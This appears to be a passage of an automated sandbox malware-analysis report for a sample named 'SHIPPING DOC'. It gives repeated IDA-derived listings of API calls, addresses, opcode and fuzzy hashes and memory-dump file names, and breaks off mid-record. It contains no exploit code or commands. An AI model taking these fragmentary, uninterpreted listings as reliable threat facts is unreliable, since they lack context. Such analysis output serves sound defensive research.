                                                                                                                      • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                      • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                      • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                      • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1938898002-0
                                                                                                                      • Opcode ID: 0b38315dd5595bc9b6cdba2c23ba2101394e99cbfafbb6bdfa5f530b56cc0c70
                                                                                                                      • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                                      • Opcode Fuzzy Hash: 0b38315dd5595bc9b6cdba2c23ba2101394e99cbfafbb6bdfa5f530b56cc0c70
                                                                                                                      • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                      • _memmove.LIBCMT ref: 0044B555
                                                                                                                      • _memmove.LIBCMT ref: 0044B578
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2737351978-0
                                                                                                                      • Opcode ID: acaa13feec575fcc8965567212d79990a10c5ddbc5928143d32797644f5f1a34
                                                                                                                      • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                      • Opcode Fuzzy Hash: acaa13feec575fcc8965567212d79990a10c5ddbc5928143d32797644f5f1a34
                                                                                                                      • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                                      • __calloc_crt.LIBCMT ref: 00415246
                                                                                                                      • __getptd.LIBCMT ref: 00415253
                                                                                                                      • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                                      • _free.LIBCMT ref: 0041529E
                                                                                                                      • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3638380555-0
                                                                                                                      • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                                                      • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                                      • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                                                      • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                      • API String ID: 3207048006-625585964
                                                                                                                      • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                      • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                                      • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                      • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                      • inet_addr.WSOCK32(?), ref: 0046559B
                                                                                                                      • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                      • _memmove.LIBCMT ref: 004656CA
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                      • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2945290962-0
                                                                                                                      • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                      • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                      • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                      • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                      APIs
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                      • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                      • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1457242333-0
                                                                                                                      • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                      • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                                      • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                      • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 15295421-0
                                                                                                                      • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                      • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                                      • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                      • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                      • _wcstok.LIBCMT ref: 004675B2
                                                                                                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                      • _wcscpy.LIBCMT ref: 00467641
                                                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                      • _wcslen.LIBCMT ref: 00467793
                                                                                                                      • _wcslen.LIBCMT ref: 004677BD
                                                                                                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 780548581-3081909835
                                                                                                                      • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                                                                      • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                                      • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                                                                      • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                      • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                                      • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                                      • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                                      • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                                      • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                                      • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                                      • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4082120231-0
                                                                                                                      • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                      • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                                      • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                      • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                                      • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2027346449-0
                                                                                                                      • Opcode ID: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                                                                                                                      • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                                      • Opcode Fuzzy Hash: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                                                                                                                      • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                      • GetMenu.USER32 ref: 0047A703
                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                                      • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                                      • _wcslen.LIBCMT ref: 0047A79E
                                                                                                                      • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                                      • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3257027151-0
                                                                                                                      • Opcode ID: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                                                                                                                      • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                                      • Opcode Fuzzy Hash: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                                                                                                                      • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                                      APIs
                                                                                                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastselect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 215497628-0
                                                                                                                      • Opcode ID: 7869ea255bd8c826c1db511583610b45135028457a69a3d51942e2ff55a69274
                                                                                                                      • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
